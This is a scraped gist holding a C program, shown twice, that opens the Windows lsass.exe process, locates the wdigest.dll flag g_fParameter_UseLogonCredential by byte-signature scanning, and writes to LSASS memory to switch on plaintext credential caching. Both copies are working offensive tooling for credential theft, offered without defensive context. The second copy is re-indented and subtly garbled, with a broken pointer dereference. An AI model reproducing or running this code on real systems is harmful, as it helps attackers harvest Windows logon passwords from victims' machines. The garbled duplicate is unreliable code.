xpn/wdigest_on.c Secret

## wdigest_on.c
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>

// Signature for inst to cmp dword ptr [wdigest!g_fParameter_UseLogonCredential],ebx
unsigned char signature[] = { 0xf7, 0x47, 0x50, 0x00, 0x08, 0x00, 0x00, 0x0f, 0x85, 0xfe, 0x71, 0x00, 0x00, 0x39, 0x1d };

// Open a handle to the LSASS process
HANDLE GrabLsassHandle(int pid) {
	HANDLE procHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, pid);
	return procHandle;
}

// Write memory to LSASS process
SIZE_T WriteToLsass(HANDLE hLsass, void* addr, void *memIn, int memInLen) {
	SIZE_T bytesWritten = 0;

	WriteProcessMemory(hLsass, addr, memIn, memInLen, &bytesWritten);

	return bytesWritten;
}

// Searches for lsass.exe PID
int GetLsassPid() {

	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	if (Process32First(hSnapshot, &entry)) {
		while (Process32Next(hSnapshot, &entry)) {
			if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
				return entry.th32ProcessID;
			}
		}
	}

	CloseHandle(hSnapshot);
	return 0;
}

int ToggleWDigest(HANDLE hLsass) {
	unsigned char* ptr = 0;
	ULONG value = 1;

	ptr = (unsigned char*)LoadLibraryA("wdigest.dll");
	if (ptr == NULL) {
		printf("[x] Error: Could not load wdigest.dll into process\n");
		return 1;
	}

	printf("[*] Searching for g_fParameter_UseLogonCredential\n");
	for (int i = 0; i < 0x220000; i++) {
		if (ptr[i] == signature[0] && ptr[i + 1] == signature[1]) {
			if (memcmp(ptr + i, signature, sizeof(signature)) == 0) {
				ptr += i + sizeof(signature);
				ptr += (*(DWORD*)ptr) + 4;
				break;
			}
		}
	}
	if (ptr == (unsigned char*)0) {
		printf("[x] Error: Could not find signature in wdigest.dll\n");
		return 1;
	}
	printf("[*] Found g_fParameter_UseLogonCredential at %p\n", ptr);
	printf("[*] Toggling g_fParameter_UseLogonCredential to 1 in lsass.exe\n");

	// No need to check in lsass, as Windows ASLR loads at the same address across processes
	WriteToLsass(hLsass, ptr, &value, sizeof(value));

	printf("[*] Done... wdigest credential caching should now be on\n");
}

int main()
{
	int lsassPid;
	HANDLE hLsass;

	printf("[ WDigest Toggle ]\n");
	printf("   @_xpn_\n\n");

	lsassPid = GetLsassPid();
	if (lsassPid == 0) {
		printf("[x] Error: Could not find lsass.exe process\n");
		return 1;
	}

	hLsass = GrabLsassHandle(lsassPid);
	if (hLsass == INVALID_HANDLE_VALUE) {
		printf("[x] Error: Could not open lsass.exe\n");
		return 1;
	}

	ToggleWDigest(hLsass);

}
	#include <stdio.h>
	#include <windows.h>
	#include <tlhelp32.h>

	// Signature for inst to cmp dword ptr [wdigest!g_fParameter_UseLogonCredential],ebx
	unsigned char signature[] = { 0xf7, 0x47, 0x50, 0x00, 0x08, 0x00, 0x00, 0x0f, 0x85, 0xfe, 0x71, 0x00, 0x00, 0x39, 0x1d };

	// Open a handle to the LSASS process
	HANDLE GrabLsassHandle(int pid) {
	HANDLE procHandle = OpenProcess(PROCESS_QUERY_INFORMATION \| PROCESS_VM_READ \| PROCESS_VM_WRITE, FALSE, pid);
	return procHandle;
	}

	// Write memory to LSASS process
	SIZE_T WriteToLsass(HANDLE hLsass, void* addr, void *memIn, int memInLen) {
	SIZE_T bytesWritten = 0;

	WriteProcessMemory(hLsass, addr, memIn, memInLen, &bytesWritten);

	return bytesWritten;
	}

	// Searches for lsass.exe PID
	int GetLsassPid() {

	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	if (Process32First(hSnapshot, &entry)) {
	while (Process32Next(hSnapshot, &entry)) {
	if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
	return entry.th32ProcessID;
	}
	}
	}

	CloseHandle(hSnapshot);
	return 0;
	}

	int ToggleWDigest(HANDLE hLsass) {
	unsigned char* ptr = 0;
	ULONG value = 1;

	ptr = (unsigned char*)LoadLibraryA("wdigest.dll");
	if (ptr == NULL) {
	printf("[x] Error: Could not load wdigest.dll into process\n");
	return 1;
	}

	printf("[*] Searching for g_fParameter_UseLogonCredential\n");
	for (int i = 0; i < 0x220000; i++) {
	if (ptr[i] == signature[0] && ptr[i + 1] == signature[1]) {
	if (memcmp(ptr + i, signature, sizeof(signature)) == 0) {
	ptr += i + sizeof(signature);
	ptr += ((DWORD)ptr) + 4;
	break;
	}
	}
	}
	if (ptr == (unsigned char*)0) {
	printf("[x] Error: Could not find signature in wdigest.dll\n");
	return 1;
	}
	printf("[*] Found g_fParameter_UseLogonCredential at %p\n", ptr);
	printf("[*] Toggling g_fParameter_UseLogonCredential to 1 in lsass.exe\n");

	// No need to check in lsass, as Windows ASLR loads at the same address across processes
	WriteToLsass(hLsass, ptr, &value, sizeof(value));

	printf("[*] Done... wdigest credential caching should now be on\n");
	}

	int main()
	{
	int lsassPid;
	HANDLE hLsass;

	printf("[ WDigest Toggle ]\n");
	printf(" @_xpn_\n\n");

	lsassPid = GetLsassPid();
	if (lsassPid == 0) {
	printf("[x] Error: Could not find lsass.exe process\n");
	return 1;
	}

	hLsass = GrabLsassHandle(lsassPid);
	if (hLsass == INVALID_HANDLE_VALUE) {
	printf("[x] Error: Could not open lsass.exe\n");
	return 1;
	}

	ToggleWDigest(hLsass);

	}